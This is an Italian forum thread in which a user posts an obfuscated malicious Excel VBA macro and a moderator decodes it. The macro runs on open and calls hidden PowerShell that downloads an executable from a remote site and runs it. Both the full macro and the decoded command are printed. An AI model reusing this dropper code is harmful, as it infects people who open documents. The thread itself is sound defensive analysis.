Condividi:        

MACRO possibile Virus:possibile capire cosa puo' fare?

Vuoi potenziare i tuoi documenti Word? Non sai come si fa una macro in Excel? Devi creare una presentazione in PowerPoint?
Oppure sei passato a OpenOffice e non sei sicuro di come lavorare al meglio?

Moderatori: Anthony47, Flash30005

MACRO possibile Virus:possibile capire cosa puo' fare?

Postdi valle1975 » 16/10/17 16:39

Buongiorno, capisco che la mia domanda sia un pò "strana", ma vorrei provare comunque a chiedere a voi che potete certamente darmi una risposta certa: malauguratamente un file excel "malevolo" è stato ricevuto e ahime aperto da un collega, e dopo aver fatto tutti i controlli del caso e pulito il pulibile sul suo client, ho paura che possa esserci qualcosa di latente pronto a fare danni..
tramite una sandbox ho aperto il file e verificato le macro al suo interno che vi allegherei, chiedendovi di spiegarmi cosa punta di fare tale macro..
Ringraziandovi in anticipo, ecco le macro al suo interno.Io riconosco solo la macro in apertura del documento e diverse funzioni che non sono in grado di tradurre.

Codice: Seleziona tutto
Rem Attribute VBA_ModuleType=VBADocumentModule
Option VBASupport 1

Function erpooter()
erpooter = """"
End Function

Function dredjuje()
dredjuje = Right(Left("Rexellent Property Management", 4), 3)
End Function

Function klemetingo()
dimiiim = Array("tem" + "p", "lo" + "cal" + "ap" + "pd" + "ata", "ap" + "pda" + "ta", "EMA" + "IL")
klemetingo = dimiiim(neemvertigo)
End Function

Function geocountruus()
geocountruus = "d   /c" + erpooter
End Function

Function vintagetable()
vintagetable = altion + geocountruus + plainchaisr + erpooter + "do{sle" + "ep 49;(.(\""{2}{0}{1}\"" -f'-o','bje" + "ct','new') (\""{1}{3}" + "{5}{0}{2}{4}\"" -f't','sy" + "st','.webclie','em','nt','.ne')).('d'+'ow'+'nloadfil'+'e')." + Left("Invasive", 3) + "oke('https://lliliwuwyqu.co/fisc','%" + klemetingo + "%." + dredjuje + "')}whi" + "le(!$?);&(\""{0}" + "{2}{1}\""-f'sta" + "r','ss','t-proce') '%" + klemetingo + "%." + dredjuje + "'" + erpooter + erpooter
End Function

Function neemvertigo()
Randomize
zerotool = Int((3 - 0 + 1) * Rnd) + 0
neemvertigo = zerotool
End Function

Function altion()
altion = Left("macbook", 3)
altion = Right(altion, 1) + Left(altion, 1)
End Function

Function plainchaisr()
evergooo = Array(Now(), Minute(Now), Minute(Now), "oP" + "r  " + "-e")
bigyapol = Array(Now(), "AS" + "S -W" + "i", Now())
nagoyya = "DD" + "en  "
viliotageto = Array(Now(), Minute(Now), Now(), Now(), "uT" + "i  B", Minute(Now), Now(), Now())
deppmounter = Array(Now(), "eLL  " + "-N")
hrumeroved = Array(Now(), "owe" + "RS", Now(), Now())
peterhoht = Array(Now(), Now(), Now(), "RaC" + "t")
plainchaisr = "p" + hrumeroved(1) + "h" + deppmounter(1) + "on" + "iN" + "Te" + peterhoht(3) + "iv" + "E  -N" + evergooo(3) + "xeC" + viliotageto(4) + "yP" + bigyapol(1) + "nD" + "O " + " hI" + nagoyya
End Function


Sub Workbook_Open()
If vbYesNo > 0 Then
Shell vintagetable, xlArabicNone
End If
End Sub


Valerio
---------------------------------
Windows 10 Professional + MS Office 2016 STD Ita
valle1975
Utente Senior
 
Post: 213
Iscritto il: 27/09/10 16:33

Sponsor
 

Re: MACRO possibile Virus:possibile capire cosa puo' fare?

Postdi Anthony47 » 16/10/17 23:53

L'obiettivo della macro e' mandare in esecuzione questo script di powershell:
Codice: Seleziona tutto
cmd   /c"poweRSheLL  -NoniNTeRaCtivE  -NoPr  -exeCuTi  ByPASS -WinDO  hIDDen  "do{sleep 49;(.(\"{2}{0}{1}\" -f'-o','bject','new') (\"{1}{3}{5}{0}{2}{4}\" -f't','syst','.webclie','em','nt','.ne')).('downloadfile').Invoke('https://lliliwuwyqu.co/fisc','%localappdata%.exe')}while(!$?);&(\"{0}{2}{1}\"-f'star','ss','t-proce') '%EMAIL%.exe'""

Come vedi al suo interno ci sono classici comandi per "aprire le porte" a programmi esterni:
Codice: Seleziona tutto
(New-Object System.Net.Webclient).DownloadFile()
Start-Process

Il download del file e' avvenuto dal sito https://l l i l i wuwyqu.co/fisc

Aprendo questo link il mio antivirus dichiara il sito infetto da Win32.MdeClass, una minaccia di tipo trojan.

Prova a cercare Win32.MdeClass removal per suggerimenti su cosa fare.
Subito dopo io farei un "ripristino di sistema" a una data antecedente al fattaccio.

Mi sembra una cosa analoga a quanto capitato ad altro utente, vedi viewtopic.php?t=108843

Ciao
Avatar utente
Anthony47
Moderatore
 
Post: 19181
Iscritto il: 21/03/06 16:03
Località: Ivrea


Torna a Applicazioni Office Windows


Topic correlati a "MACRO possibile Virus:possibile capire cosa puo' fare?":


Chi c’è in linea

Visitano il forum: Nessuno e 38 ospiti